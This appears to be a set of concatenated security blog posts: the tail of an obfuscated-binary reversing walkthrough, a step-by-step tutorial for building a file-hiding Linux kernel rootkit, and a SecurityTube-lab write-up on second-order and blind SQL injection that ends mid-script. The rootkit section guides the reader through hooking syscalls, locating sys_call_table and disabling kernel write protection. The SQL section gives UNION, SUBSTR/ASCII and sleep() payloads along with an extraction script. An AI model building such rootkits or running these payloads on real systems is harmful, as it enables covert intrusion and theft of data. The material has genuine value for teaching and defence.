I kept the assignment to EDI (on line 2) there because, although I've removed the need for it in assigning the value of EAX (on line 5), it still might be used in the future.
Also, the assignment to bl (on line 3) still might not be needed but we shall keep it there just in case.
Let's quickly review the state of the registers:
The register state and code rewrite should be constantly updated as you go through the code.
The next instruction is lea ebp,[esp+ecx*1], which is the same as EBP = ESP + ECX * 1 or EBP = ESP + 0 * 1 or EBP = ESP.
After this instruction we enter the following loop:
So this first moves a byte at ESI + EDX * 1, which is basically just ESI + EDX, into the cl register. We know at this point the value inside EDX is 1 and that ESI points to some address in the middle of the application, so our loop will start getting data 1 byte after that address.
This byte is then compared with al, which we know is 0xee, and if they are the same execution will jump to Six.
Provided the jump to Six isn't taken, the byte is moved to the top of the stack (which ESP points to), ESP is adjusted accordingly, EDX is incremented by 1 and the loop is rerun.
The mov instruction on line 8 doesn't do anything; it is dead code which can be removed.
Now we can find all of the data that is being worked on here:
The starting address of this data is 80480bc in the original disassembly, which is 1 byte after the address of the instruction following the call instruction in the jmp-call-pop routine at the start of the application.
It ends with the ee value because this is the point at which the jump to Six is taken.
Also, notice that nowhere here is a 0x0 (or 00) byte. This means that the jg (jump if greater than) instruction on line 10 will always be taken: every byte there is above 0, so the 2 instructions after it are dead code and can be removed from the analysis, and the jg can be replaced with a jmp.
It is clear that this data, which is sitting in the middle of the application, is being put on the stack for some reason. The lea instruction right before the loop just saved the address pointing to the beginning of the new location of the data on the stack into the EBP register.
We could try to figure out how meaningful this data is now but it would be best to have a look to see what the application does with it first.
Now let's take the jump to Six:
First it loads the address of the data on the stack, currently in EBP, into EDX.
cl, which is currently 0xee, is put onto the stack and ESP is adjusted accordingly.
We then enter into the 2nd loop:
This is a very unusual loop; you will only see this type of code when reversing obfuscated code.
It starts by pushing its own address to the stack, which allows the ret on line 10 to return to Seven.
The test instruction on line 3 is dead code because all test does is set EFLAGS, and they are immediately overwritten by the cmp instruction that follows.
Lines 4 and 5 again test the value of a byte in the data, this time pointed to by EDX, against 0xee and jump to Eight when it's reached.
The next 2 instructions, lines 6 and 7, move the value from EDI into EBX and add 0x1f to it. We already know that 0x25 is currently in EDI, so EBX = 0x25 + 0x1f or EBX = 0x44.
The byte in the data is then xor'd with bl (or 0x44) and EDX is decremented.
Clearly this is a simple xor encoding of the data. I wrote a python script a while ago to xor a number of bytes with 1 byte and output both the resulting bytes as ascii characters and the same characters reversed (due to little endian architectures). Here is the script:
This script is very simple. 1 thing to bear in mind though is that, because we are dealing with data outside of the printable ascii range (0x20 - 0x7e), we can't just type the characters on the command line.
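A minimal sketch of a single-byte xor decoder of the kind described above might look like the following. The function names, the hex-string input format and the use of '.' for unprintable bytes are all assumptions made for illustration, and the round trip only uses the key (0x44) and the decoded string that the analysis arrives at.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def printable(data: bytes) -> str:
    """Render bytes as text, replacing anything outside 0x20-0x7e with '.'."""
    return "".join(chr(b) if 0x20 <= b <= 0x7e else "." for b in data)


def decode(hex_data: str, hex_key: str):
    """Return the decoded text in stored order and in reversed order."""
    plain = xor_bytes(bytes.fromhex(hex_data), int(hex_key, 16))
    return printable(plain), printable(plain[::-1])


# Round trip: encode a known string with the key 0x44, then decode it again.
encoded = xor_bytes(b"I am not going!", 0x44).hex()
forward, backward = decode(encoded, "44")
print(forward)
print(backward)
```

Passing the bytes as a hex string avoids having to type unprintable characters on the command line.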
So we run the script like this:
So now we know what that data in the middle of the application is. Clearly it was done like this to confuse, but we have reversed enough of the application now to figure out what it is.
With this in mind, we no longer need those 2 loops, or any of the code aimed at moving and decoding the data; we can simply put the data in as is.
Let's review our rewritten application:
I have obviously removed most of the code because it simply isn't needed now. I've made sure that EBP still points to the end of the data and EDX to the beginning, just in case there is some reason for this, but most of the code so far was devoted to decoding the data, which is no longer needed.
Now for the registers:
The next 5 instructions show another weird use of call and jmp:
Firstly there is an assignment to bh (the second 8 bits of the EBX register) but then, on line 5, the whole EBX register is cleared using xor so line 2 is dead code.
The call instruction on line 3 and the jmp instruction on line 8 seem to be used just to confuse the reverser; there is no other reason for them. Bear in mind, though, that this would have stuck 4 bytes on the stack, next to the decoded data, which haven't been cleaned up (this could affect the application in some way).
The rest of this code just zeroes out EBX, ECX and EDX.
The next 8 instructions are very interesting:
Lines 1 and 3 fix the value of ESP after the call, jmp sequence earlier.
The rest xor's 0x5 with the byte at One and compares the result with 0x4. We can test this out in python. We know the byte at One is 0xed, so:
This isn't equal to 0x4 so the jump on line 8 will not be taken.
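As a quick sanity check of that comparison, here is a small sketch using only the two values given above (the variable names are illustrative):

```python
byte_at_one = 0xed            # the byte at the label One, as stated above
result = byte_at_one ^ 0x5    # the xor performed by the application

print(hex(result))            # 0xe8
print(result == 0x4)          # False, so the conditional jump is not taken
```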
The next instruction, lea ecx,[ebp-0xf], loads EBP - 0xf (EBP - 15) into ECX. ECX will now point to somewhere in the middle of the data (it will actually point 16 characters from the end, which is the start of the string I am not going!).
We can probably guess at what this is going to do from here but let's finish the analysis.
0x10 is then loaded into EDX and then 2 unconditional jumps are taken:
The only reason for these jumps is to confuse the reverser, so we can just ignore them.
The next 7 lines are a very important part of the application:
So lines 1-4 set EAX to 0x4, lines 5 and 6 set EBX to 0x1 and then interrupt 0x80 is raised.
Interrupt 0x80 is a special interrupt which initiates a system call. The system call number has to be stored in EAX, which is 0x4 at this moment in time.
We can figure out what system call this is:
This makes sense, the prototype for this syscall is:
The arguments go in EBX, ECX and EDX, in that order. So to write to stdout, EBX should be 1, which it is.
ECX should point to the string, and it currently points to I am not going!, and EDX should contain the number of characters to print, which it does.
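To make the register-to-argument mapping concrete, here is a rough user-space sketch of the same call using Python's os.write. The helper name sys_write is hypothetical, and the trailing newline in the message is an assumption made so that the length matches the 0x10 loaded into EDX.

```python
import os


def sys_write(fd: int, buf: bytes, count: int) -> int:
    """Rough equivalent of the write syscall: EBX=fd, ECX=buf, EDX=count."""
    return os.write(fd, buf[:count])


message = b"I am not going!\n"          # 16 bytes; the newline is assumed
written = sys_write(1, message, 0x10)   # fd 1 is stdout
```

The return value is the number of bytes written, just as the real system call leaves it in EAX.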
The last 4 instructions just run another syscall, exit. You can check this yourself if you wish:
Obviously we can now write this in a much simpler way, but there is no need; we know exactly what this application does and how it does it.
Improving Obfuscation
As I mentioned earlier, the obfuscation could have been done better to make the reversing process harder. I actually purposefully made the obfuscation weaker than I could have to make the challenge easier.
Inserting more junk data in between some instructions could make the static disassembly significantly more difficult to read and understand.
I actually had to add a byte (0x89) at the end of the data section because the next few instructions were being obfuscated in a way that made them unreadable:
The disassembly shown here has had the last byte of the data removed; it shows the last line of the data section and a few lines after it.
As you can see the byte following the data section has been moved to the data section and as a result the next few instructions have been incorrectly disassembled.
This method can be implemented throughout the whole application, making most of the instructions disassemble incorrectly.
Constant unfolding could be improved here, for instance:
Could be rewritten to:
They both do the same thing but the second is a little harder to read. You could obviously keep extending this by implementing more and more complex algorithms to work out your required value.
This can also be applied to references to memory addresses, for instance, if you want to jump to a certain memory address, do some maths to work out the memory address before jumping there.
More advanced instructions could be used like imul, idiv, cmpsb, rol, stosb, rep, movsx, fadd, fcom... The list goes on...
The MMX and other unusual registers could have been taken advantage of.
Also, the key to decrypt the data could have been a command line argument or somehow retrieved from outside of the application; this way it would have been extremely difficult to decode the data.
Conclusion
There are sometimes easier ways to get a result other than reversing the whole application, maybe just understanding a few bits might be enough.
Although there are ways to make the reverser's job more difficult, it's never possible to make an application impossible to reverse, provided the reverser is able to run the application (if the CPU can see the instructions, then so can the reverser).
A good knowledge of assembly is needed to do any type of in-depth reverse engineering.
Further Reading
Reversing: Secrets of Reverse Engineering by Eldad Eilam
Rootkit for Hiding Files
In this post I am going to be putting together all of the knowledge we have gained in the previous posts and improving on the last rootkit in a few different ways.
I will fix the issue that I explained the last LKM had (being able to query the file directly using ls [filename]), while making it more portable and giving it the ability to hide multiple files, but I will start by splitting the LKM into multiple files to make it easier to manage.
The code for this rootkit will be in a link at the bottom of the post in .tgz format.
Splitting The LKM
Having the LKM split across multiple files makes it easier to manage, especially as the module gets more and more complex.
First we will start with the main file:
I've made a couple of changes here: I now set the sys_call_table page back to read-only after I've made the change, and I've changed the names of the init and exit functions. Other than that it is copied and pasted from the last LKM.
Now for the file containing the system calls:
We also need to create a header file for the syscalls so that the functions can be referenced from the main.c file:
This needs to be included in both the main.c and syscalls.c files; just add the line #include "syscalls.h" somewhere near the top.
This is why we have to put the #ifndef guard in the header: it ensures that the file's contents will not be included twice.
Now we need to create the C file for the last set of functions:
We also need to create a header file for these functions so we can use them inside main.c:
This file also needs to be included in main.c with the line #include "functs.h".
We now need a makefile:
I couldn't get it to work by just running make so I had to run the full command myself:
We can ignore these warnings for the moment because we are going to replace these functions anyway.
Now to test our rootkit:
So it seems to work nicely, now we can concentrate on extending it.
Automagically Finding sys_call_table
A brilliant writeup of how to find the sys_call_table, amongst other things, on x86 Linux is here. I highly recommend reading that post.
We are going to use the technique under section 3.1, titled How to get sys_call_table[] without LKM.
You can use a slight variation of this technique on each architecture; just search Google a bit and you should be able to find something if you can't work it out from this description.
Firstly we need to read the Interrupt Descriptor Table Register (IDTR) and get the address of the base of the Interrupt Descriptor Table (IDT).
Entry 0x80 of the IDT (each entry is 8 bytes, so it sits at byte offset 8 * 0x80 from the IDT base address) holds the address of a function called system_call. This function uses a call instruction to dispatch system calls through the sys_call_table.
Once we have the base address of the system_call function we need to search through its code for 3 bytes ("\xff\x14\x85"). These are the opcode bytes of that call instruction, and the 4 bytes that follow them are the address of the sys_call_table.
The memmem function just searches through memory for a particular set of bytes and returns a pointer to it if found or NULL if not. It's implemented in libc but we will have to implement it ourselves in our LKM.
We also need to remember to include the 2 structs idtr and idt.
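The search step can be modelled in user space to show the idea. This is only a sketch: bytes.find stands in for memmem, the helper name find_sys_call_table is hypothetical, and the sample bytes and the address 0xc0123456 are made up for the example and not taken from a real kernel.

```python
import struct

CALL_PATTERN = b"\xff\x14\x85"   # call *addr(,%eax,4) on 32-bit x86


def find_sys_call_table(code: bytes):
    """Return the 32-bit address that follows the call opcode, or None."""
    offset = code.find(CALL_PATTERN)            # plays the role of memmem
    if offset == -1 or offset + len(CALL_PATTERN) + 4 > len(code):
        return None
    # The address is stored little endian straight after the 3 opcode bytes.
    (address,) = struct.unpack_from("<I", code, offset + len(CALL_PATTERN))
    return address


# Made-up bytes standing in for the start of the system_call function.
sample = b"\x90\x90\x50" + CALL_PATTERN + struct.pack("<I", 0xc0123456) + b"\x90"
print(hex(find_sys_call_table(sample)))
```

In the LKM the same logic works on a pointer into kernel memory rather than on a bytes object.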
Here's the code for all of this which we can put into functs.c:
We also need to add the following prototype to functs.h:
Lastly we need to edit main.c so that we get the address of sys_call_table using this method. We just replace the line that starts sys_call_table = with:
Improving The Method Of Writing To Read-Only Memory
So far we have manually changed the page table entry to make the specific page that we want to write to read-write.
As we are running with the same privileges as the kernel we can do this in an easier way and ensure that any changes to this mechanism in the future don't stop our ability to write to this memory.
Running in kernel mode we have the ability to change the CR0 register.
Bit 16 of the CR0 register (the write protect, or WP, bit) controls whether the CPU, when running in kernel mode, is prevented from writing to memory marked read-only.
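The bit manipulation involved is small enough to show on its own. This sketch only does the arithmetic on an integer; the function names and the example CR0 value are assumptions for illustration, and in the LKM the value would be read from and written back to the real register.

```python
CR0_WP = 1 << 16        # the write protect bit, 0x10000


def disable_wp(cr0: int) -> int:
    """Clear bit 16 so writes to read-only pages are allowed."""
    return cr0 & ~CR0_WP


def enable_wp(cr0: int) -> int:
    """Set bit 16 again to restore normal write protection."""
    return cr0 | CR0_WP


cr0 = 0x8005003b        # example value only, not read from real hardware
print(hex(disable_wp(cr0)))               # 0x8004003b
print(hex(enable_wp(disable_wp(cr0))))    # 0x8005003b
```

Only bit 16 changes, so every other CR0 flag is left exactly as it was.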
With this in mind we can rewrite the functions that we were using in functs.c for this:
I've changed the names to make it apparent that these functions are actually doing something different.
You also need to change the 2 prototypes in functs.h to:
Lastly we need to edit main.c, remembering that these new functions do not require an argument.
Multi-File Support
To support hiding multiple files we need to implement a character device to communicate with the rootkit (we could use a network connection but we'll take that up later) and we need a method of storing the data.
For storing the data we will use a linked list. The kernel has its own facilities for manipulating linked lists but I will create my own functions for doing this as a programming exercise (later we will investigate how to use the features already in the kernel).
Linked List
First let's create the linked list and the functions for adding and removing items:
The structure of each element is defined at the top (lines 1 - 4). It's pretty simple, just a basic singly linked list.
2 functions are then defined, addfile and remfile, which are pretty self-explanatory. 1 thing to note here is that the vmalloc function is being used to allocate the memory, which allocates a contiguous address range of virtual memory. This obviously means that vfree has to be used to free the memory afterwards.
Both of these functions take 1 argument, a string, and add or remove that string to the list depending on which function is called.
It's best to create a function that empties the list:
Lastly we need a function to check if a name exists in the list:
This function takes a string as an argument and iterates through the list, checking first the length and then the whole string against every entry in the list. If it finds a match it returns 1, otherwise it returns 0.
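The behaviour of these 4 functions can be modelled in a few lines. This is a user-space sketch of the logic described above, not the kernel code: the class names are hypothetical, and skipping duplicate names in addfile is a design choice of this sketch and not something the text states.

```python
class Node:
    """One element of the singly linked list: a name and a next pointer."""
    def __init__(self, name, next_node=None):
        self.name = name
        self.next = next_node


class HiddenFiles:
    def __init__(self):
        self.head = None

    def lookupfilename(self, name):
        """Return 1 if name is in the list, otherwise 0."""
        cur = self.head
        while cur is not None:
            # Cheap length check first, then the full comparison.
            if len(cur.name) == len(name) and cur.name == name:
                return 1
            cur = cur.next
        return 0

    def addfile(self, name):
        """Insert name at the head (duplicates are skipped in this sketch)."""
        if not self.lookupfilename(name):
            self.head = Node(name, self.head)

    def remfile(self, name):
        """Unlink the first node whose name matches."""
        prev, cur = None, self.head
        while cur is not None:
            if cur.name == name:
                if prev is None:
                    self.head = cur.next
                else:
                    prev.next = cur.next
                return
            prev, cur = cur, cur.next

    def emptylist(self):
        """Drop every node (the kernel version must vfree each one)."""
        self.head = None
```

A list built with addfile("a") and addfile("b") answers 1 for both names until remfile or emptylist removes them.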
Initially I developed this linked list in a normal C application and just improved upon it and kernelfied it. :-) Here is my original application:
Clearly this application is using more primitive versions of the addfile and remfile functions above. It's also using usermode's malloc and free instead of vmalloc and vfree, for obvious reasons.
I only included this to show how I've developed these functions in usermode and then converted it to kernelmode.
Anyway, the kernel functions above (addfile, remfile, emptylist and lookupfilename) as well as the struct declarations and definition should go into the file list.c.
#include "list.h" should be put at the top and the file list.h should be created with the following:
We need to include the linux/vmalloc.h header file for the vmalloc and vfree functions.
syscalls.c needs to be changed: list.h needs to be included, the FILE_NAME definition should be removed and the strncmp line should be changed to use lookupfilename instead, so it should end up like the following:
Because we want to hide some files when the LKM is loaded and also empty the list when the LKM is unloaded, we need to include the list.h header file and make the relevant calls to addfile and emptylist in main.c, so our main.c should end up like this:
Lastly we need to edit the Makefile to include list.o, so it should end up like this:
Now to compile and test:
So, as you can clearly see, our LKM automatically hides files on initialization and now should have the capability to hide multiple files.
Character Device
We now need the ability to communicate with the LKM to dynamically hide and unhide files. The only way we've learned how to do this so far is by using a character device.
This character device will be simpler than our previous one because we only need the write operation but you can implement read for feedback if you want.
We will put this in a new file:
Here I'm setting the maximum size to 512 but you can set it to what you wish.
I also return the number of bytes written here so that it doesn't break some applications that try to write to it (python for example).
The first character of the input is being used as the operation (A or a for adding a file and R or r for removing a file) and the actual filename starts after the second character in the input.
I've also fixed the buffer overflow that was in the last character device.
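The command format described above can be sketched as a small parser. This models only the protocol, not the kernel write handler: the function name parse_command is hypothetical, and stripping a trailing newline is an assumption (it is what a tool like echo would append).

```python
MAX_INPUT = 512   # the maximum size mentioned above


def parse_command(data: bytes):
    """Split device input into (operation, filename), or None if invalid."""
    data = data[:MAX_INPUT].rstrip(b"\n")   # never look past the maximum size
    if len(data) < 3:
        return None                          # need an operation and a name
    op = chr(data[0]).lower()                # first character is the operation
    name = data[2:].decode(errors="replace") # name starts after the 2nd character
    if op == "a":
        return ("add", name)
    if op == "r":
        return ("remove", name)
    return None


print(parse_command(b"A secret.txt\n"))   # ('add', 'secret.txt')
print(parse_command(b"r secret.txt\n"))   # ('remove', 'secret.txt')
```

Truncating the input to the maximum size before doing anything else is what keeps the buffer overflow from coming back.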
We need to create the following header file:
Now we need to include cdev.h in main.c, by adding the line #include "cdev.h" at the top, initialize the device on load and remove the device on unload, so our main.c should end up like this:
Lastly we need to add cdev.o to the makefile:
Now we just need to test it:
As you can see, we are now able to hide and unhide files on demand. There is, however, still a problem:
Hiding Files Better
Now let's hide the files even when they are queried directly.
To figure out how to do this we will use the same method as we did when figuring out how to hide files to begin with, by looking at the system calls that are being made and hooking them.
We will start by determining the system calls responsible for this:
I've grepped for the filename because the system call must be querying the filename directly, and we've found 2 (stat64 and lstat64).
It looks like they return 0 when successful, so let's see what happens when they are unsuccessful:
So they return -ENOENT if the file does not exist.
Another thing to note about this output is that the second argument to both stat64 and lstat64 is a pointer to a buffer which is populated by the system call on success and obviously left unfilled on failure.
The manpage for these functions confirms that:
We don't care too much about the stat struct because if the name matches any of our hidden files we will just return -ENOENT, and otherwise we will forward the request to the original system call.
If we wanted to actually manipulate the results that applications got back from these system calls, we could use this structure to do so.
One more thing to check is what the request looks like when a full path is given:
So the full path is passed to the system call. We will have to deal with this because we only have a list of filenames, so we will have to manually extract the actual filename to check against our list.
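The decision the hooks have to make can be sketched as follows. This is a user-space model only: the function names are hypothetical, a Python set stands in for the linked list, and the 2 hidden names are the ones the rootkit hides on load later in the post.

```python
import errno

hidden = {"hidefiles", "hidefiles.ko"}   # stands in for the linked list


def filename_of(path: str) -> str:
    """Return everything after the last '/' (the whole path if there is none)."""
    return path.rsplit("/", 1)[-1]


def hooked_stat64(path, original_stat64):
    """Pretend hidden files don't exist, otherwise call the real handler."""
    if filename_of(path) in hidden:
        return -errno.ENOENT
    return original_stat64(path)


def fake_original(path):
    """Placeholder for the saved original system call; always succeeds."""
    return 0


print(hooked_stat64("/root/hidefiles.ko", fake_original))   # -2
print(hooked_stat64("/etc/passwd", fake_original))          # 0
```

Because only the last path component is compared, a relative name and a full path to the same file are treated identically.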
First let's write the function which extracts the filename from the full path and checks if it is in the list:
We need to add the prototype in list.h so that the other files can use it:
Now for the system calls, this should be added to syscalls.c:
And we need to update syscalls.h:
We need to include linux/stat.h because that includes the declaration of the stat64 structure.
And lastly we need to update main.c to hook and unhook these 2 syscalls on load/unload:
I've changed the files that it automatically hides when loaded to hidefiles (which is the name of the character device file) and hidefiles.ko (which is the name of the LKM) because this is more useful. In reality these would be named something less descriptive and the other source files wouldn't be there.
Finally to test it:
Funnily enough this also hides directories with a name that is in the list but doesn't stop you from cd'ing there:
Anyway, our improved rootkit seems to work nicely and as expected.
It is still currently easy to detect our rootkit though:
You can get the full finished source code for the rootkit here.
Conclusion
We have used a number of techniques here to figure out how to hide files on the system and we have combined all of the knowledge we have gained so far to achieve this.
However, there are still a lot of ways we can improve this LKM, hiding the LKM's existence, and using the network to communicate are just a couple (we will take these up later).
When dealing with kernel code you have to be very careful as you can break the whole system. This is evident with the first character device that we created (just load the device and write 5000 bytes to it and the system will crash instantly).
Happy Kernel Hacking :-)
Further Reading
This article on Kernel Rootkit Tricks by Jürgen Quade
The Phrack article titled Linux on-the-fly kernel patching without LKM by sd and devik
Designing BSD Rootkits by Joseph Kong
And of course the kernel documentation
SQL Injections
Here I will demonstrate how to detect different SQL injection vulnerabilities and how to perform a few different SQL injection types using applications that are vulnerable to a second order SQL injection and 2 different blind SQL injection attacks.
The first I will look at is the second order SQL injection. A second order SQL injection happens when user input is stored in the database and later retrieved and used in a different SQL query; it's this second SQL query that is vulnerable to SQL injection.
Second Order SQL Injection
The application I will be testing is a challenge at securitytube's SQLi labs, challenge 13. Here is the challenge from the documentation:
As you can see we are told very little about the application and there are no rules, we just have to find the admin password and login as the admin.
Detection
First we have to look at the application by using it. When we visit the URL in the challenge we get:
By filling out the form and clicking the register me! button we get:
It looks like there is a login page too:
After logging in with the account we have just created we see the following:
So let's try using the classic single quote (') technique to see if anything different happens:
As you can see, there is nothing different about the user account creation process, so let's log in with this new account:
You can see that the email address is no longer given. We can guess that the username is used in another query to retrieve the email address after login, which is then presented to the user.
Confirmation
Now that we have a suspected SQL injection we need to confirm that it is in fact an SQL injection vulnerability.
1 way to do this is by sending a syntactically correct query which is functionally the same as 1 which we know the result of.
To do this we need to guess the query being run, from what we know so far we can guess that the query is something like:
We also know a good username (foobar) and the resulting email address ([email protected]).
For the known good username the query would look something like:
We can inject foo' 'bar as the username. MySQL concatenates adjacent string literals, so this would be functionally the same and should result in the same email address being returned.
So the resulting query would look something like:
The above will work for MySQL databases but not MSSQL, Oracle or others so this is 1 way we can determine the database software that is in use.
If this doesn't work we could try putting a + in between the 2 strings for MSSQL or || for Oracle.
If we also make sure that the email address is different ([email protected]):
We will know if the injection has worked based on the value of the email address that we get back once we log in:
So it worked! Instead of getting back the email address that we registered with we got back the email address of the other account (foobar).
This means that there is almost definitely an exploitable SQL injection vulnerability and it also means we are very likely communicating with a MySQL database.
Exploitation
For exploitation here we will probably need to use a UNION based injection.
The UNION statement allows us to combine the result set of 2 or more SELECT statements.
However, before we can concentrate on exploitation we need to know the number of columns returned in the original query.
One way we can figure this out is by using the ORDER BY keyword.
First we order by 1, which will sort by the first column, so we inject foobar' order by 1 -- :
That worked because we received the email address, meaning that there is at least 1 column returned. Notice that we appended -- after the injection to comment out the rest of the query (the remaining single quote '), so the full query would look something like this:
Now we try ordering by 2 (or the second column):
Here we received no email address meaning that the original query is only returning 1 column, so the query probably looks more like this:
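The ORDER BY probing can be tried out locally. The sketch below uses Python's sqlite3 module as a stand-in for the real MySQL backend, with a made-up users table and a deliberately vulnerable lookup_email function. All of these names are assumptions for illustration, not the challenge's code.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway database with one hypothetical account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, email TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('foobar', 'foobar@example.test', 'secret')")
    return db


def lookup_email(db: sqlite3.Connection, username: str) -> list:
    """Deliberately vulnerable: the username is pasted into the query."""
    query = "SELECT email FROM users WHERE username = '%s'" % username
    try:
        return db.execute(query).fetchall()
    except sqlite3.Error:
        return []  # the page would simply show no email address


def count_columns(db: sqlite3.Connection, known_user: str, limit: int = 10) -> int:
    """Raise ORDER BY n until the query stops returning an email."""
    for n in range(1, limit + 1):
        if not lookup_email(db, "%s' order by %d -- " % (known_user, n)):
            return n - 1
    return limit


if __name__ == "__main__":
    print(count_columns(make_db(), "foobar"))
```

The first n for which no email comes back is one more than the number of columns in the original SELECT.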
Now that we know the number of columns we can concentrate on the exploitation.
There is 1 more thing we need to do before inserting our UNION statement because the application will probably only return 1 entry from the result set, but we can test this by injecting something that will return more than 1 result:
So it only returned the email address meaning that only the first result is output to the page.
We can fix this by invalidating the first statement by inserting an always false statement after an AND and then inserting our UNION statement after that.
The resulting query will look something like this:
Here I am concatenating the output of @@version (which displays the version of the server software), database() (which displays the name of the current database) and current_user() (which displays the database user that the web application is logged in as):
So the name of the database is 2ndorder, we need this information to solve the challenge.
Concatenation is needed because we only have 1 field where we can return data, but you will see that, even though we only have 1 field, we can use this to return a large amount of data.
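As a rough local illustration of squeezing several values through a single column, the sketch below again uses sqlite3 in place of MySQL. The table, the accounts and the first_email function are all hypothetical, and SQLite's || operator and group_concat stand in for the MySQL functions used against the real target.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, email TEXT, password TEXT)")
db.executemany(
    "INSERT INTO users VALUES (?, ?, ?)",
    [
        ("admin", "admin@example.test", "hunter2"),
        ("foobar", "foobar@example.test", "secret"),
    ],
)


def first_email(username: str):
    """Vulnerable lookup that only ever displays the first row."""
    query = "SELECT email FROM users WHERE username = '%s'" % username
    row = db.execute(query).fetchone()
    return row[0] if row else None


# AND 1=0 empties the original result set, so the UNION row is the only row.
# Several columns and rows are folded into the single returned field.
payload = (
    "foobar' AND 1=0 UNION "
    "SELECT group_concat(username || ':' || password, ',') FROM users -- "
)
leaked = first_email(payload)

if __name__ == "__main__":
    print(leaked)
```

The same single field can carry table names, column names or credentials, as long as everything is concatenated into one string first.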
We will now use the information found in the previous query to learn the schema of the database.
We will use the information_schema database to find the schema and GROUP_CONCAT to concatenate the rows together:
As you can see, we now have the names of every table and every column in the 2ndorder database.
Now it's trivial to get the admin password:
And finally logging in as admin to complete the challenge:
Content-based Blind SQL Injection
The second injection I will demonstrate is a content-based blind SQL injection.
A blind SQL injection is an SQL injection where the results of the queries aren't output to the page.
What makes it content-based is that the page can be controlled in some manner.
For this I will be looking at challenge 5:
I will not solve the whole of this challenge here but will get to a point where it's trivial to solve it.
Detection
So we start like normal and use the application, here is the page you see when you load the website:
If we click Submit we get this:
So it looks like it tells us whether or not there were results returned by the query that runs in the background.
As normal we should add a single quote (') to see if we get a reaction:
Confirmation
So the job_title field might be vulnerable to SQL injection but we can try to confirm this using string concatenation, as we did before:
So we got the same result as the original query which strongly suggests that we have an SQL injection here.
Exploitation
This is pretty easy to exploit but we need to use a conditional statement.
We could use CASE but in this case we'll use IF.
This exploit could be made more efficient but I'll demonstrate that in the next example.
For now we'll determine the result byte-by-byte in a sequential manner.
First let's guess at what the actual query looks like:
What we want to do, based on our findings, is search through a string character by character and normally return no results but if we find the right character then return results.
We can use SUBSTR to search through a string, so if we create a query similar to this:
This checks the character at position i from the string returned by current_user() against the character c, if they are equal, it returns 1, making the query true and returning results, otherwise it returns 0, making the query false and not returning any results.
This way we will get a different page if the character c is correct than we will if the character is incorrect.
I've found that we can run into problems when we do it this way; the solution is to convert the character into its ASCII decimal equivalent using the ASCII function and compare that with a number.
So it ends up like this:
Where i is the position as before but c is a numerical representation of a character that we are testing for.
Once we find the right value for c, we increment i and start again, until we've iterated through our whole character set and not found a match which means we've reached the end of the string.
So if the character matches, the page will return results otherwise it will not.
Using this information it is trivial to write a script that uses this technique to find out the current user of the database:
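A minimal sketch of such a script could look like the following. The exact payload string, the function names and the oracle callback are assumptions: in a real run oracle would send the payload in the vulnerable field and return True when the page shows results, whereas here a fake oracle answers locally so the logic can be checked without a target.

```python
import re
from typing import Callable


def make_condition(expr: str, pos: int, code: int) -> str:
    """Build the IF/ASCII/SUBSTR condition for one position and character code."""
    return "IF(ASCII(SUBSTR(%s,%d,1))=%d,1,0)" % (expr, pos, code)


def extract(oracle: Callable[[str], bool], expr: str,
            charset=range(32, 127), max_len: int = 64) -> str:
    """Recover the value of expr one character at a time."""
    found = ""
    for pos in range(1, max_len + 1):
        for code in charset:
            if oracle(make_condition(expr, pos, code)):
                found += chr(code)
                break
        else:
            break  # nothing in the character set matched: end of the string
    return found


def fake_oracle_for(secret: str) -> Callable[[str], bool]:
    """Local stand-in for the web page: answers as the database would."""
    pattern = re.compile(r"SUBSTR\(.*,(\d+),1\)\)=(\d+),")

    def oracle(payload: str) -> bool:
        pos, code = map(int, pattern.search(payload).groups())
        return pos <= len(secret) and ord(secret[pos - 1]) == code

    return oracle


if __name__ == "__main__":
    print(extract(fake_oracle_for("root@localhost"), "current_user()"))
```

In the worst case this makes one request per candidate character per position, which is why the later examples look at faster search strategies.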
You can use this to retrieve any data from the database by just changing current_user() to the query that returns the data that you want, for instance:
But bear in mind the more data you try to retrieve, the longer it will take.
Time-based Blind SQL Injection
Lastly I want to demonstrate a time-based injection.
A time-based injection is where the attacker injects a time delay into the query based on a condition and determines the result of the condition based on the time it took for the page to return.
For this I will use challenge 10:
This challenge can also be completed using a content-based approach but I will ignore that and use purely a time-based approach.
A time-based attack generally works where others might fail but it takes the longest so depending on the amount of data you want to retrieve, it might not be viable.
One advantage of a time-based attack rather than the content-based attack that we performed in the last demonstration is that the time-based approach doesn't generate database errors, meaning it has less chance of being noticed.
Detection
So let's first look at the application:
So it looks like some sort of sorting page. We seem to have 3 options (Id, First Name and Surname).
Clicking the Submit Query button gives us:
So it's sorted the returned values by the Id field, but this request was a POST request so to look at the request properly we need another piece of software.
Anytime I am analysing a web application, I always have my browser set up to go through Burp Suite.
Burp Suite is an intercepting proxy which has a huge number of features and IMO is an absolute must when doing any web hacking.
Looking at the request in Burp, we see:
We can guess that the query that is being run in the background is something like:
The actual application gives us different results depending on our input, we have 1 result for each field (id, first_name and last_name) and 1 result for an error (the following page was generated by inserting a single quote (') in the sort_results field):
So we could actually test for 4 different possibilities with a single request, to do this we could inject the following conditional statement:
Here we are checking the first character for current_user() against 100 (d), 101 (e) and 102 (f).
If it is a d then the results will be sorted by the Id field, if it is an e they will be sorted by the first_name field, if it is an f they will be sorted by the last_name field and if it isn't any of those 3 then the query will fail and we will get the same page as when we entered the single quote.
But we are going to ignore this and imagine that the application never returns anything, just some generic page.
If this was the case the only option we have is time-based.
To test this, all we have to do in this situation is inject sleep(5); if the application is vulnerable the page will take longer to return.
In other situations we might need to try injecting + sleep(5), ' + sleep(5) --, ' + sleep(5) + ', ' union select sleep(5) --, ' union select null, sleep(5)# and so on...
But this application does delay with the simple sleep(5) injected.
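The timing check itself is easy to automate. Here is a minimal sketch, assuming a hypothetical send callable that submits one value for the vulnerable field and returns once the response has arrived. The baseline value "id" and the 80% tolerance are my own assumptions, not something taken from the challenge.

```python
import time
from typing import Callable


def response_time(send: Callable[[str], object], payload: str) -> float:
    """Time a single request carrying the given payload."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def looks_time_injectable(send: Callable[[str], object],
                          payload: str = "sleep(5)",
                          baseline_payload: str = "id",
                          delay: float = 5.0) -> bool:
    """Compare a normal request with one that should trigger the delay."""
    baseline = response_time(send, baseline_payload)
    delayed = response_time(send, payload)
    # Allow some slack so small timing jitter doesn't cause a false negative.
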